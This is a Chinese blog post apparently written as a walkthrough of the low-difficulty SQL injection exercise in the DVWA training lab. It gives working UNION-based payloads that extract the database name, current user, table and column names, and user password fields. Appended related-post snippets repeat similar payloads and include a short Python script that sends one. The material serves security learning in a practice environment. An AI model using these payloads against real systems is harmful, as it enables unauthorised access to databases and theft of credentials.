【网络安全】DVWA之SQL注入—low level解题详析

原创 已于 2025-03-14 19:51:11 修改 · 1.2w 阅读 · 7 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #sql #dvwa

于 2023-04-19 19:56:09 首次发布
本文介绍了如何判断SQL注入漏洞的类型,如数字型和字符型,并展示了如何确定注入点的数量。接着,文章详细讲解了如何通过注入技巧来爆库名、当前用户名、表名、列名以及字段。在遇到非法字符混合错误时,给出了调整数据库排序规则的解决策略。

文章目录

判断漏洞类型

判断漏洞类型原理可参考[网络安全]SQL注入原理及常见攻击方法简析

  • 判断是否为数字型注入

在这里插入图片描述在这里插入图片描述
若为数字型注入,则第二个语句应回显Error或没有回显。

  • 判断是否为字符型注入
    在这里插入图片描述在这里插入图片描述

第二个语句没有回显,所以该漏洞类型为字符型注入漏洞。

判断注入点个数

输入1' order by 4#时,回显Unknown column '4' in 'order clause'
说明猜测的注入点个数过大
输入1' order by 2#时,回显如下:
在这里插入图片描述说明注入点个数为2或3
输入1' order by 3#时,回显Unknown column '3' in 'order clause'
所以注入点个数为两个

爆库名

输入1' union select 1,database()#
回显一个数据库名

在这里插入图片描述图片中第一段为第一个注入点的信息,第二段为第二个注入点(即database)的信息。

爆当前用户名

输入1' union select 1,user()#
在这里插入图片描述
由于注入点有两个,所以我们可以通过一个sql语句既查询数据库名又查询当前用户名
输入1' union select user(),database()#

在这里插入图片描述
注意,如果使用1' union select user()#的话,会回显The used SELECT statements have a different number of columns(所使用的 SELECT 语句具有不同数量的列),因为该语句的注入点只有一个。

爆表名

输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
回显guestbook和users两个表名

在这里插入图片描述
也可采用如下语句
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述
其中,group_concat的作用是将多个值连接成一个字符串,并用逗号连接。

爆列名

输入1' union select 1, column_name from information_schema.columns where table_name='users'#

在这里插入图片描述
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
相比之下,在查询结果过多的情况下,建议使用group_concat将查询结果集合起来

爆字段

输入1' union select user,password from users#

在这里插入图片描述

报错分析及解决方法

若SQL联合注入过程中出现该报错:illegal mix of collations for operation UNION
原因如下:information_schema里的table的排序规则是utf8_general_ci,而user表中字段默认为utf8_unicode_ci,导致字符排序不匹配。
解决方法:

1.在phpstudy中打开phpMyAdmin

在这里插入图片描述

2.进入dvwa数据库中的user表,将各列排序规则修改为utf8_gengeral_ci,保存即可。
在这里插入图片描述

DVWAsql注入low
m0_52923241的博客
03-12 659
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
DVWA------sql注入low)(字符型)
qwsn
11-01 2110
================================================================================== 0x01:上low源码 ================================================================================== 0x02:sql注入low) 一...
DVWA靶场SQL注入low
qq_61975388的博客
08-17 797
DVWA靶场SQL注入实战
sql注入dvwalow
****的博客
09-02 319
靶机:dvwa bug:SQL Injection 难度等low ** 分 ** 在输入框中分别输入“1”、“1’ and 1=1#”,“1’ and 1=1#”三条命令。发现第一条和第二条能执行成功,第三条不能执行成功,这说明这个地方存在注入点。(直接上sqlmap试试) sqlmap爆破 利用burpsuite抓取数据包,获取requests的header,存入txt文本中。 ...
【fairy】DVWA sql注入——等low
weixin_40822297的博客
09-21 507
提示输入User ID,将显示ID,First name, Surname.这里输入ID为1, 可以得出此处为注入点,尝试输入1‘ 返回错误。 利用order by num语句猜测查询信息列表,修改num的值,输入1’ order by 1#页面正常显示。继续测试,1’ order by 2#、1’ order by 3# Num值为2时显示正常,3时报错,由此可以推...
[网络安全]DVWASQL注入—High level解题 [网络安全]DVWASQL注入—High level
2401_88752464的博客
01-05 493
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。
DVWASQL注入解(包含知识点)
10-20
SQL注入网络安全领域中的一种常见的攻击手段,它允许攻击者通过在应用程序的输入参数中插入恶意的SQL代码片段,从而在数据库服务器上执行未授权的查询或操作。这种攻击方法对数据库安全构成了极大的威胁,因此了解...
dvwa靶场sql注入low
qq_14902381的博客
08-22 606
dvwa 靶场,sql注入low
SQL注入DVWA靶场SQL注入实践
weixin_40433003的博客
01-23 1608
接下来,对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息;如上图所示,可以看到我们获得了关键字段:user和password,因此我们接着使用如下语句进行注入。(3)确定回显位置为第二个位置(查询结果显示在原始查询返回的第二列的位置)firefox自带插件,但是遇到收费版本,需要引入一个文件(进行过滤,即攻击者可以对数据库进行操作。当输入1,回显正常,确认存在sql注入。,返回错误,说明页面没有对。
DVWA SQL注入low)
fqefeq的博客
03-08 2267
若输入1’and ‘1’ =’1(或1’and 1 =1#),正常返回;输入1’ and’1’=’2(或1’and 1=2#),不正常返回,则证明其为字符型注入(一般用#方法)若输入1 and 1 =1,正常返回;输入1 and 1=2,不正常返回,则证明其为数字型注入(题中输入1 and 1=2,正常返回,不是数字型注入)后台语句:select Firstname,Surname from users where id='1' union select 1,2#'1.判断注入点是否存在注入
DVWA sql注入-LOW
m0_46616663的博客
05-23 722
1.判断是否存在sql注入漏洞 出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。 如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。 2.判断注入漏洞的类型 分为两种: 数字型和字符型。 这是数据库本身存储数据时赋予给数据的类型。 先判断是否为数字型: 输入1 and 1 = 1 页面运行正常 输入1 and 1 = 2 页面也运行正常 分: 如果查询语句为数字型的话...
dvwa学习sql注入 low
过客璇璇的博客
03-11 5406
刚刚学习web安全,老师第二节课就让用dvwa学习sql注入了,下面是我自己通过书上的学习以及在dvwa摸索的过程,求大牛们多多指点,勿要喷我别:Low从页面上看到,有一个可以提交查询内容的地方我们可以通过以下步骤判断这里是否存在注入点① 输入1  提交②输入1' 提交③输入1 and 1=1 提交④输入1 and 1=2提交由上可以看出是存在注入点的,  我们猜测sql查询语句是这样的:  s...
DVWASQL注入LOW
weixin_46831054的博客
02-17 3410
SQL注入流程 面对一个查询条件的web网页,我们需要做以下的事情 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 这里我们用hackbar,方便我们操作。 http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit# 利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的 1.判断是否
DVWA sql injection low
weixin_43345082的博客
06-12 311
Dvwa Low 1 1’ 1 and 1=1 1 and 1=2 select First name的列名 and Surname的列名from 表名 where id的列名 =‘我们输入的id’ 那么我们首先爆出它的库试试,用单引号让id闭合 内置查询函数version()  user()  database()  @@version_compile_os 输入 1’ union select...
DVWA靶场进行SQL注入————(LOW
weixin_51334173的博客
04-06 3051
Web应用程序未正确过滤用户输入,直接将输入拼接到SQL查询语句中时,攻击者可以构造恶意输入,篡改原始SQL逻辑,从而执行非预期的数据库操作(如窃取数据、删除表、绕过登录等)。
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1873
DVWAsql注入漏洞-low
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1305
low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWA系列】——SQL注入——low细教程
最新发布
2402_84408069的博客
06-15 1893
摘要:本文针对DVWALow安全别的SQL注入漏洞进行细分。该别因用户输入直接拼接SQL语句且无过滤,导致可通过单引号闭合进行注入攻击。文章演示了从探测注入点到获取数据库信息、表名、字段名及用户凭证的完整流程,并提供了防御建议,如使用预处理语句和输入过滤。同时对比了不同安全别的防护措施,强调预处理语句是根治方案。本教程仅用于教育目的,实际渗透需授权进行。
dvwa----sql盲注low
qq_45487671的博客
05-28 1333
实验4 SQL盲注 1.实验目的 (1)理解SQL盲注(布尔盲注、时间盲注、报错盲注)的原理; (2)学习手工盲注的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL盲注的基本知识,爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
dvwasql注入low实验中如何获取当前数据库名称
05-27
### 获取 DVWA SQL 注入 Low 别的当前数据库名称 在 DVWASQL 注入模式下,由于安全防护较低,可以直接利用简单的 SQL 查询语句来提取目标数据。为了获取当前使用的数据库名称,可以使用 `UNION SELECT` 技术结合 MySQL 内置的 `DATABASE()` 函数实现这一目的。 以下是具体的操作方式: 1. **构造查询字符串** 利用 `UNION SELECT` 将注入点的数据替换为目标数据。假设输入框中的参数名为 `id`,可以通过以下 URL 构造请求: ``` http://<DVWA_IP>/vulnerabilities/sqli/?id=1 UNION SELECT DATABASE()&Submit=Submit# ``` 这里的核心部分是 `UNION SELECT DATABASE()`,它会返回当前正在使用的数据库名[^1]。 2. **验证结果** 提交上述 URL 后,在页面显示的结果中可以看到一个字段被替换成实际的数据库名称。通常情况下,默认的数据库名称为 `dvwa`。 3. **注意事项** - 在 Low 别下,单引号未被转义或过滤,因此可以直接执行上述操作。 - 如果遇到其他别的安全性设置(如 Medium 或 High),可能需要额外处理特殊字符或采用盲注技术[^2]。 #### 示例代码 如果希望通过脚本自动化完成此过程,可参考如下 Python 脚本: ```python import requests url = "http://<DVWA_IP>/vulnerabilities/sqli/" payload = "?id=1 UNION SELECT DATABASE()" cookies = { "PHPSESSID": "<SESSION_ID>", "security": "low" } response = requests.get(url + payload, cookies=cookies) if response.status_code == 200 and "dvwa" in response.text: print(f"Current Database Name: {response.text.split('<pre>')[1].split('</pre>')[0]}") else: print("Failed to retrieve the database name.") ``` 该脚本发送带有注入负载的 GET 请求,并解响应内容以提取数据库名称。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值